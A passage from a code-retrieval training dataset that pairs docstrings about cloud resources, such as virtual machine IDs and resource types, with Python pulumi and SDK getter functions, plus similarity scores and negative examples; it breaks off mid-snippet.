"def give_metadata(self):\n\n m = dict()\n m['dynamic_expressions'] = self.dynamic_expressions\n\n cust_labels = {}\n for key, value in self.column_labels_custom.iteritems():\n cust_labels[self.raw_to_colname(key)] = value\n m['column_labels_custom'] = cust_labels\n\n m['colsel'] = [self.raw_to_colname(col) for col in self.colsel]\n\n colsizedict = {}\n for col, size in enumerate(self.colsize):\n colsizedict[self.raw_to_colname(col)] = size\n m['colsize'] = colsizedict\n\n marksdict = {}\n for mark, colset in self.marks.iteritems():\n marksdict[mark] = [self.raw_to_colname(col) for col in colset]\n m['marks'] = marksdict\n\n m['name'] = self.name\n return m",
"def author(self):\n\n for item in self.metadata:\n if item.tag.localname == \"creator\":\n if 'file-as' in item.tag:\n return item.tag['file-as']\n else:\n return item.tag.text",
"def _metadata_map():\n return {\n 'date_added': 'dateAdded',\n 'dns_active': 'dnsActive',\n 'last_modified': 'lastModified',\n 'private_flag': 'privateFlag',\n 'whois_active': 'whoisActive',\n 'key_name': 'Key Name',\n 'value_type': 'Value Type',\n 'value_name': 'Value Name',\n 'block': 'Block',\n 'mutex': 'Mutex',\n 'as_number': 'AS Number',\n 'hostname': 'hostName',\n }",
"def get_metadata(self):\n result = defaultdict(str)\n result.update(self.metadata)\n result['file_name'] = self.file_name\n return result",
"def updated_by(self) -> Optional['outputs.UserInfoResponse']:\n return pulumi.get(self, \"updated_by\")",
"def metadata(self):\n return copy.copy(self._metadata)",
"def __init__(__self__, *,\n created_at: str,\n created_by: str,\n created_by_type: str,\n last_modified_at: str,\n last_modified_by: str,\n last_modified_by_type: str):\n pulumi.set(__self__, \"created_at\", created_at)\n pulumi.set(__self__, \"created_by\", created_by)\n pulumi.set(__self__, \"created_by_type\", created_by_type)\n pulumi.set(__self__, \"last_modified_at\", last_modified_at)\n pulumi.set(__self__, \"last_modified_by\", last_modified_by)\n pulumi.set(__self__, \"last_modified_by_type\", last_modified_by_type)",
"def get_metadata():\n\n module = __name__.split('.', 1)\n\n pkg = pkg_resources.get_distribution(module[0])\n meta = {\n 'Name': None,\n 'Version': None,\n 'Summary': None,\n 'Home-page': None,\n 'Author': None,\n 'Author-email': None,\n 'License': None,\n }\n\n for line in pkg.get_metadata_lines(\"PKG-INFO\"):\n for par in meta:\n if line.startswith(par + \":\"):\n _, value = line.split(\": \", 1)\n meta[par] = value\n\n return meta",
"def get_meta(self) -> Meta:\n return Meta(\n object_type=\"profile\",\n extra_custom_props=[\n (\"property\", \"profile.username\", self.user.username),\n (\"property\", \"profile.first_name\", self.user.first_name),\n (\"property\", \"profile.last_name\", self.user.last_name),\n ]\n if self.user\n else [],\n title=self.display_name or self.name,\n image=self.image.large,\n )",
"def created_by(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"created_by\")",
"def metadata(self, timestamp=None):\n\n records = {}\n for k in self.file.root.photons.photontable.attrs._f_list('user'):\n data = getattr(self.file.root.photons.photontable.attrs, k)\n try:\n data = data.get(timestamp, preceeding=True)\n records[k] = data\n except AttributeError:\n records[k] = data\n except ValueError:\n pass # no data\n\n return records",
"def generate_metadata(self):\n self.metadata = {\n 'title': os.path.basename(self.source_file).rsplit('.', 1)[0],\n 'url': self.relative_destination_file,\n 'full_path': os.path.dirname(self.relative_destination_file),\n 'short_path': self.shorten_path(\n os.path.dirname(self.relative_destination_file))\n }",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def updated_by(self) -> \"str\":\n return self._attrs.get(\"updatedBy\")",
"def meta_data(self):\r\n return simplejson.dumps(self.__resource_meta)",
"def GetMetadata(self):\n return self.dict['meta']",
"def get_metadata(self):\n return self.client._perform_json(\n \"GET\", \"/projects/%s/recipes/%s/metadata\" % (self.project_key, self.recipe_name))",
"def metadata(self) -> email.message.Message:\n raise NotImplementedError()",
"def metadata(self, tokens):\n\n return self.process_value_pairs(tokens, \"metadata\")",
"def metadata(self) -> pulumi.Output[Optional['outputs.SecurityAssessmentMetadataPropertiesResponse']]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self) -> pulumi.Output[Optional['outputs.SecurityAssessmentMetadataPropertiesResponse']]:\n return pulumi.get(self, \"metadata\")",
"def metadata(self):\n return self._partition_meta_data",
"def metadata(self):\n return self._partition_meta_data",
"def creator(self) -> str:\n return pulumi.get(self, \"creator\")",
"def creator(self) -> str:\n return pulumi.get(self, \"creator\")",
"def metadata(self):\n metadata = dict([(key,{}) for key in self.keys])\n for day in self.days:\n metadata[\"Days\"].append(day.attrs)\n for period in day.period:\n metadata[\"Periods\"].append(period.attrs)\n for course in period.courses:\n metadata[\"Courses\"].append(course.attrs)\n for instructor in course.instructor:\n metadata[\"Instructors\"].append(instructor.attrs)\n return metadata"
] | [
"0.6872594",
"0.63301516",
"0.62992716",
"0.62992716",
"0.62992716",
"0.62992716",
"0.62210387",
"0.62001103",
"0.6097473",
"0.60971665",
"0.6086979",
"0.6079593",
"0.6051205",
"0.60385454",
"0.60385454",
"0.60385454",
"0.60385454",
"0.60265017",
"0.6005793",
"0.6004641",
"0.59962",
"0.59876734",
"0.598701",
"0.598701",
"0.5972229",
"0.59504455",
"0.594829",
"0.5934055",
"0.59145904",
"0.5902085",
"0.5900807",
"0.58718616",
"0.58680093",
"0.58139366",
"0.580804",
"0.580804",
"0.580804",
"0.580804",
"0.580804",
"0.5791525",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57913464",
"0.57846767",
"0.5779704",
"0.57795197",
"0.577079",
"0.57679504",
"0.5716927",
"0.57153505",
"0.5713494",
"0.56887597",
"0.56798553",
"0.5675552",
"0.5674131",
"0.5669661",
"0.5642266",
"0.5623935",
"0.5617508",
"0.5600007",
"0.55940855",
"0.55940855",
"0.55821085",
"0.5577614",
"0.5553725",
"0.5544866",
"0.5532705",
"0.55232334",
"0.5521143",
"0.5520942",
"0.55204207",
"0.5507454",
"0.5492119",
"0.5488373",
"0.5486684",
"0.54733497",
"0.54713297",
"0.5471094",
"0.54583466",
"0.54507333",
"0.54494715",
"0.54372984",
"0.54367185",
"0.5426261",
"0.5426261",
"0.5426261",
"0.5424847",
"0.54212034",
"0.54153126",
"0.5399376",
"0.5395459",
"0.53902733",
"0.53902733",
"0.5379288",
"0.5379288",
"0.5374333",
"0.5374333",
"0.5347511"
] | 0.0 | -1 |
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts" | def type(self) -> pulumi.Output[str]:
return pulumi.get(self, "type") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def resource_type(self) -> Optional[str]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[str]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_type\")",
"def resource_type(cls):\n pass",
"def request_resource_type(self) -> str:\n return pulumi.get(self, \"request_resource_type\")",
"def get_resource_type(self):\n category = self.get_first_category(DATA_KIND_SCHEME)\n if category is not None:\n return category.label\n else:\n return None",
"def type(self) -> pulumi.Input['ResourceIdentityType']:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:\n return pulumi.get(self, \"type\")",
"def _get_resource_type(self, resource_path):\n remove_query = resource_path.split('?')[0] # remove query parameters\n remove_slashes = remove_query.strip('/') # strip leading and trailing slashes\n return remove_slashes.rstrip('s') # remove trailing 's'",
"def resource_kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_kind\")",
"def resource_type(self, resource_type):\n if self.local_vars_configuration.client_side_validation and resource_type is None: # noqa: E501\n raise ValueError(\"Invalid value for `resource_type`, must not be `None`\") # noqa: E501\n allowed_values = [\"Unknown\", \"File\", \"PeopleStageElement\", \"PeopleStageDiagram\", \"PeopleStageSeed\", \"PeopleStageSeedSet\", \"PeopleStageChannel\", \"PeopleStageAggregation\", \"PeopleStageVoucherSet\", \"PeopleStageTemplate\", \"CascadeElement\", \"FastStatsElement\", \"UserElement\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and resource_type not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `resource_type` ({0}), must be one of {1}\" # noqa: E501\n .format(resource_type, allowed_values)\n )\n\n self._resource_type = resource_type",
"def type(self):\n return self.properties.get('type')",
"def type(self):\n\n return self.manifest[\"type\"]",
"def source_resource_type(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_resource_type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self) -> str:\n return pulumi.get(self, \"type\")",
"def type(self):\n return self._getValue('type')",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")",
"def res_type(self):\n return self.get(\"res_type\", decode=True)",
"def type(self, mpath):\n try:\n return self.stat(mpath)[\"type\"]\n except errors.MantaResourceNotFoundError:\n return None\n except errors.MantaAPIError:\n _, ex, _ = sys.exc_info()\n if ex.code in ('ResourceNotFound', 'DirectoryDoesNotExist'):\n return None\n else:\n raise",
"def type(self):\n return self.container['type']",
"def type(self):\n return self.container['type']",
"def get_type(self) -> str:\n return self.type",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self) -> Optional[str]:\n return pulumi.get(self, \"type\")",
"def type(self):\n return self._device.type_name",
"def GetDiskType(self) -> str:\n disk = self.compute_client.disks.get(\n self.resource_group_name, self.name)\n disk_type = disk.sku.name # type: str\n return disk_type",
"def type(self) -> str:\n return self.type_",
"def resource_types(self) -> Sequence[str]:\n return pulumi.get(self, \"resource_types\")",
"def type(self) -> str:\n return self._type",
"def type(self) -> str:\n return self._type",
"def type(self) -> str:\n return self._type",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")",
"def object_type(self) -> str:\n return pulumi.get(self, \"object_type\")"
] | [
"0.7918516",
"0.7918516",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7866337",
"0.7708053",
"0.75534964",
"0.7282099",
"0.70591027",
"0.6979169",
"0.69202054",
"0.6868452",
"0.67303157",
"0.67049116",
"0.6654272",
"0.6646357",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.66396123",
"0.65510035",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.65426683",
"0.6487309",
"0.6455862",
"0.6447202",
"0.6447202",
"0.6430232",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63791203",
"0.63719594",
"0.63487995",
"0.63141537",
"0.63127893",
"0.6305381",
"0.6305381",
"0.6305381",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216",
"0.63023216"
] | 0.0 | -1 |
Field Deprecated. These fields will be empty/omitted. The list of virtual machine resource IDs, excluding any Hybrid AKS virtual machines, that are currently using this L3 network. | def virtual_machines_associated_ids(self) -> pulumi.Output[Sequence[str]]:
return pulumi.get(self, "virtual_machines_associated_ids") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _GetMachineList(self):\n machines = self._experiment.remote\n # All Label.remote is a sublist of experiment.remote.\n for l in self._experiment.labels:\n for r in l.remote:\n assert r in machines\n return machines",
"def virtual_machines(self) -> Sequence['outputs.SubResourceReadOnlyResponse']:\n return pulumi.get(self, \"virtual_machines\")",
"def get_vm_list(self):\n\t\treturn Job(SDK.PrlSrv_GetVmList(self.handle)[0])",
"def security_ip_lists(self) -> pulumi.Output[Sequence[str]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def security_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n warnings.warn(\"\"\"Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"security_ip_lists is deprecated: Field 'security_ip_list' has been deprecated from version 1.187.0. Use 'ip_whitelist' instead.\"\"\")\n\n return pulumi.get(self, \"security_ip_lists\")",
"def virtual_machine_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"virtual_machine_resource_id\")",
"def virtual_machines(self) -> Sequence['outputs.SubResourceWithColocationStatusResponse']:\n return pulumi.get(self, \"virtual_machines\")",
"def instance_list(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_list\")",
"def _UpdateMachineList(self, locked_machines):\n for m in self._experiment.remote:\n if m not in locked_machines:\n self._experiment.remote.remove(m)\n\n for l in self._experiment.labels:\n for m in l.remote:\n if m not in locked_machines:\n l.remote.remove(m)",
"def build_resource_labels(self):\n response = [ \n {\n \"key\": \"instance_id\", \n \"value\": \"9113659852587170607\"\n }, \n {\n \"key\": \"project_id\", \n \"value\": \"YOUR_PROJECT_ID\"\n }, \n {\n \"key\": \"zone\", \n \"value\": \"us-east4-a\"\n }\n ]\n return response",
"def virtual_networks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceIdArgs']]]]:\n return pulumi.get(self, \"virtual_networks\")",
"def machine_specs(self) -> Optional[Sequence['outputs.AiEndpointDeployedModelDedicatedResourceMachineSpec']]:\n return pulumi.get(self, \"machine_specs\")",
"def virtual_machines(self):\n return self._virtual_machines",
"def _instancelist(self):\n\n rv = []\n self.iname = {}\n for resv in self.conn.get_all_reservations():\n for inst in resv.instances:\n if inst.state != 'terminated':\n name = inst.tags.get('Name',None)\n rv.append([inst.id,inst.state])\n if name is not None:\n rv.append([name,inst.state])\n else:\n rv.append([inst.id+'-needsName',inst.state])\n self.iname[name] = inst.id\n self.iname[inst.id] = inst.id\n return rv",
"def virtual_networks(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceIdResponse']]]:\n return pulumi.get(self, \"virtual_networks\")",
"def get_virtual_network_list(self, nFlags = 0):\n\t\treturn Job(SDK.PrlSrv_GetVirtualNetworkList(self.handle, nFlags)[0])",
"def list(self):\n\n s = self.cloudman.list_servers()\n\n servers = self.get_list(self.cloudman.list_servers(), kind=\"vm\")\n\n result = []\n for server in servers:\n\n if 'cm' in server['metadata']:\n metadata = server['metadata']['cm']\n cm = literal_eval(metadata)\n if 'cm' in server:\n server['cm'].update(cm)\n try:\n server['ip_public'] = self.get_public_ip(server=server)\n except:\n pass\n try:\n server['ip_private'] = self.get_private_ip(server=server)\n except:\n pass\n result.append(server)\n\n return result",
"def list_instances(self):\n instances = []\n try:\n pages = self.compute.virtual_machines.list(\n CONF.azure.resource_group)\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceListFailure(reason=six.text_type(e))\n raise ex\n else:\n if pages:\n for i in pages:\n instances.append(i.name)\n return instances",
"def list_virtual_networks(client, private_cloud, resource_pool, location):\n return client.list(location, private_cloud, resource_pool)",
"def ip_whitelists(self) -> pulumi.Output[Sequence['outputs.InstanceIpWhitelist']]:\n return pulumi.get(self, \"ip_whitelists\")",
"def resources(self) -> pulumi.Output[Sequence['outputs.MachineExtensionResponse']]:\n return pulumi.get(self, \"resources\")",
"def list_pilot_compute(self):\n return self.pilot_job_service",
"def view_list_machines(self, user):\r\n return [machine.IP for machine in user.realm._balancer._machines]",
"def service_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def service_ip_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"service_ip_lists\")",
"def azurerm_virtual_machine(LOGGER, VM, TERRAFORM_NETWORK_INTERFACES,\n TERRAFORM_PUBLIC_IPS, TERRAFORM_SECURITY_GROUPS,\n TERRAFORM_INVENTORY):\n LOGGER.info('Adding %s: %s to inventory.' %\n (VM['data_type'], VM['inventory_hostname']))\n\n for interface in TERRAFORM_NETWORK_INTERFACES:\n if interface['virtual_machine_id'] == VM['id']:\n PUB_IPS = []\n VM_INFO = dict()\n LOGGER.debug(interface)\n for pub_ip in TERRAFORM_PUBLIC_IPS:\n if (pub_ip['id'] in interface['public_ips'] and\n pub_ip['ip_address'] not in PUB_IPS):\n PUB_IPS.append(pub_ip['ip_address'])\n\n VM_INFO.update(\n {\n 'inventory_hostname': VM['inventory_hostname'],\n 'data_type': VM['data_type'],\n 'ansible_host': interface['private_ip_address'],\n 'location': VM['location'],\n 'mac_address': interface['mac_address'],\n 'private_ips': interface['private_ips'],\n 'public_ips': PUB_IPS,\n 'resource_group_name': VM['resource_group_name'],\n 'target': VM['target'],\n 'vm_size': VM['vm_size'],\n 'ansible_groups': VM['ansible_groups']\n }\n )\n\n for security_group in TERRAFORM_SECURITY_GROUPS:\n try:\n interface['network_security_group_id']\n if (interface['network_security_group_id'] ==\n security_group['id']):\n VM_INFO.update(\n {\n 'security_groups':\n security_group['security_groups'],\n }\n )\n except KeyError:\n LOGGER.debug(KeyError)\n pass\n\n return VM_INFO",
"def gateway_cluster_id_lists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"gateway_cluster_id_lists\")",
"def vulnerabilities_allowed_list(self):\n if 'VULNERABILITIES_ALLOWED_LIST' in os.environ:\n return os.environ[\n 'VULNERABILITIES_ALLOWED_LIST'\n ].split(',')\n else:\n return []",
"def list_resource_pool(client, private_cloud, location):\n return client.list(location, private_cloud)",
"def list_vm(client, resource_group_name=None):\n if resource_group_name is None:\n return client.list_by_subscription()\n return client.list_by_resource_group(resource_group_name)",
"def allocation_resource_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def allocation_resource_tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def slave_ips(self) -> 'List[str]':\n raise NotImplementedError",
"def get_elb_instance_ids(elbclient, elbname):\r\n try:\r\n resp = elbclient.describe_load_balancers(LoadBalancerNames=[elbname])\r\n except:\r\n print(ex.message)\r\n return None\r\n return list(map(\r\n lambda x:x['InstanceId'],\r\n resp['LoadBalancerDescriptions'][0]['Instances']\r\n ))",
"def to_deprecated_list_repr(self):\r\n return ['c4x', self.org, self.course, self.block_type, self.name, None]",
"def ExternalSystemIdentifiers(self, default=[{}]):\n tmp = self.data.get('metadata', {}).get('external_system_identifiers', default)\n return [HEP.IDObject(i) for i in tmp]",
"def __init__(__self__, *,\n resource_group_name: pulumi.Input[str],\n agent_upgrade: Optional[pulumi.Input['AgentUpgradeArgs']] = None,\n client_public_key: Optional[pulumi.Input[str]] = None,\n extensions: Optional[pulumi.Input[Sequence[pulumi.Input['MachineExtensionInstanceViewArgs']]]] = None,\n identity: Optional[pulumi.Input['IdentityArgs']] = None,\n location: Optional[pulumi.Input[str]] = None,\n location_data: Optional[pulumi.Input['LocationDataArgs']] = None,\n machine_name: Optional[pulumi.Input[str]] = None,\n mssql_discovered: Optional[pulumi.Input[str]] = None,\n os_profile: Optional[pulumi.Input['OSProfileArgs']] = None,\n os_type: Optional[pulumi.Input[str]] = None,\n parent_cluster_resource_id: Optional[pulumi.Input[str]] = None,\n private_link_scope_resource_id: Optional[pulumi.Input[str]] = None,\n service_statuses: Optional[pulumi.Input['ServiceStatusesArgs']] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vm_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if agent_upgrade is not None:\n pulumi.set(__self__, \"agent_upgrade\", agent_upgrade)\n if client_public_key is not None:\n pulumi.set(__self__, \"client_public_key\", client_public_key)\n if extensions is not None:\n pulumi.set(__self__, \"extensions\", extensions)\n if identity is not None:\n pulumi.set(__self__, \"identity\", identity)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if location_data is not None:\n pulumi.set(__self__, \"location_data\", location_data)\n if machine_name is not None:\n pulumi.set(__self__, \"machine_name\", machine_name)\n if mssql_discovered is not None:\n pulumi.set(__self__, \"mssql_discovered\", mssql_discovered)\n if os_profile is not None:\n pulumi.set(__self__, \"os_profile\", os_profile)\n if os_type is not None:\n pulumi.set(__self__, \"os_type\", os_type)\n if parent_cluster_resource_id is not None:\n pulumi.set(__self__, \"parent_cluster_resource_id\", parent_cluster_resource_id)\n if private_link_scope_resource_id is not None:\n pulumi.set(__self__, \"private_link_scope_resource_id\", private_link_scope_resource_id)\n if service_statuses is not None:\n pulumi.set(__self__, \"service_statuses\", service_statuses)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if vm_id is not None:\n pulumi.set(__self__, \"vm_id\", vm_id)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n agent_upgrade: Optional[pulumi.Input[pulumi.InputType['AgentUpgradeArgs']]] = None,\n client_public_key: Optional[pulumi.Input[str]] = None,\n extensions: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MachineExtensionInstanceViewArgs']]]]] = None,\n identity: Optional[pulumi.Input[pulumi.InputType['IdentityArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n location_data: Optional[pulumi.Input[pulumi.InputType['LocationDataArgs']]] = None,\n machine_name: Optional[pulumi.Input[str]] = None,\n mssql_discovered: Optional[pulumi.Input[str]] = None,\n os_profile: Optional[pulumi.Input[pulumi.InputType['OSProfileArgs']]] = None,\n os_type: Optional[pulumi.Input[str]] = None,\n parent_cluster_resource_id: Optional[pulumi.Input[str]] = None,\n private_link_scope_resource_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n service_statuses: Optional[pulumi.Input[pulumi.InputType['ServiceStatusesArgs']]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n vm_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def resource_labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"resource_labels\")",
"def ExternalSystemIdentifiers(self, default=[{}]):\n tmp = self.data.get('external_system_identifiers', default)\n return [HEP.IDObject(i) for i in tmp]",
"def list_instances(self):\n nodes = self._driver.list_nodes()\n return [[n.name, n.state, n.public_ips] for n in nodes]",
"def machines(self) -> Iterable[dto.Machine]:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )",
"def allocation_resource_tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:\n return pulumi.get(self, \"allocation_resource_tags\")",
"def __init__(self, id=None, description=None, provisioning_status=None, admin_state_up=None, provider=None, pools=None, listeners=None, operating_status=None, vip_address=None, vip_subnet_cidr_id=None, name=None, project_id=None, vip_port_id=None, tags=None, created_at=None, updated_at=None, guaranteed=None, vpc_id=None, eips=None, ipv6_vip_address=None, ipv6_vip_virsubnet_id=None, ipv6_vip_port_id=None, availability_zone_list=None, enterprise_project_id=None, l4_flavor_id=None, l4_scale_flavor_id=None, l7_flavor_id=None, l7_scale_flavor_id=None, publicips=None, elb_virsubnet_ids=None, elb_virsubnet_type=None, ip_target_enable=None, deletion_protection_enable=None, frozen_scene=None, ipv6_bandwidth=None):\n \n \n\n self._id = None\n self._description = None\n self._provisioning_status = None\n self._admin_state_up = None\n self._provider = None\n self._pools = None\n self._listeners = None\n self._operating_status = None\n self._vip_address = None\n self._vip_subnet_cidr_id = None\n self._name = None\n self._project_id = None\n self._vip_port_id = None\n self._tags = None\n self._created_at = None\n self._updated_at = None\n self._guaranteed = None\n self._vpc_id = None\n self._eips = None\n self._ipv6_vip_address = None\n 